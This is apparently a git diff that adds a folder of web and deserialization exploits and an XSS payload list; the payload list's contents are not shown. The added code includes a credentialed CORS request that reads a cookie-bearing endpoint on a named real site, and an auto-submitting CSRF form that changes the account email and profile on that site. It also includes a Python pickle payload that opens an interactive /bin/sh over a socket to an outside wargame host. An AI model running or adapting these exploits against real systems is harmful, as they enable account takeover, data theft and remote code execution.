guifre
diff --git a/‎exploits/cors-poc.html
Lines changed: 13 additions & 0 deletions b/‎exploits/cors-poc.html
Lines changed: 13 additions & 0 deletions
diff --git a/‎exploits/csrf-post-poc.html
Lines changed: 31 additions & 0 deletions b/‎exploits/csrf-post-poc.html
Lines changed: 31 additions & 0 deletions
diff --git a/‎exploits/pickle_deserialization.py
Lines changed: 22 additions & 0 deletions b/‎exploits/pickle_deserialization.py
Lines changed: 22 additions & 0 deletions
diff --git a/‎payloads/XSS.txt
Lines changed: 2228 additions & 0 deletions b/‎payloads/XSS.txt
Lines changed: 2228 additions & 0 deletions
@@ -0,0 +1,13 @@
+<body>
+<script>
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','http://www.pornhub.com/user/premium_redirect_cookie',true); 
+req.withCredentials = true;
+req.send();
+
+function reqListener() {
+    console.log(this.responseText); 
+};
+</script>
+</body>
@@ -0,0 +1,31 @@
+<body>
+
+ <FORM action="http://www.pornhub.com/user/edit" METHOD="POST">
+
+<input type="hidden" name="month" value="3">
+<input type="hidden" name="day" value="3">
+<input type="hidden" name="year" value="1994">
+<input type="hidden" name="gender" value="7">
+<input type="hidden" name="relation_status" value="1">
+<input type="hidden" name="orientation" value="2">
+<input type="hidden" name="website" value="">
+<input type="hidden" name="hometown" value="">
+<input type="hidden" name="city" value="Wilmslow">
+<input type="hidden" name="country" value="GB">
+<input type="hidden" name="job" value="ewf">
+<input type="hidden" name="company" value="wef">
+<input type="hidden" name="school" value="ewf">
+<input type="hidden" name="about_me" value="wef">
+<input type="hidden" name="interests" value="">
+<input type="hidden" name="fav_movies" value="">
+<input type="hidden" name="fav_music" value="">
+<input type="hidden" name="fav_books" value="">
+<input type="hidden" name="turnons" value="">
+<input type="hidden" name="turnoffs" value="">
+<input type="hidden" name="check_what" value="">
+<input type="hidden" name="email" value="dahi%40stromox.com">
+<input type="hidden" name="username" value="dahi1">
+<input type="hidden" name="password_new" value="">
+<input type="hidden" name="password_confirm" value="\">
+ </FORM>
+ <script>document.forms[0].submit();</script>
@@ -0,0 +1,22 @@
+import socket
+import cPickle as pickle
+import cPickle
+import subprocess
+import sys
+
+class Execute(object):
+    def __reduce__(self):
+        return(subprocess.call, (('/bin/sh','-i'),0,None,4,4,4))
+
+s = socket.socket()
+s.connect(('amateria.smashthestack.org', 54321))
+print s.recv(256)
+s.send(pickle.dumps(Execute()))
+while 1 == 1:
+	print s.recv(512)
+	msg = sys.stdin.readline()
+        s.send(msg + '\r\n')
+s.close()
+
+
+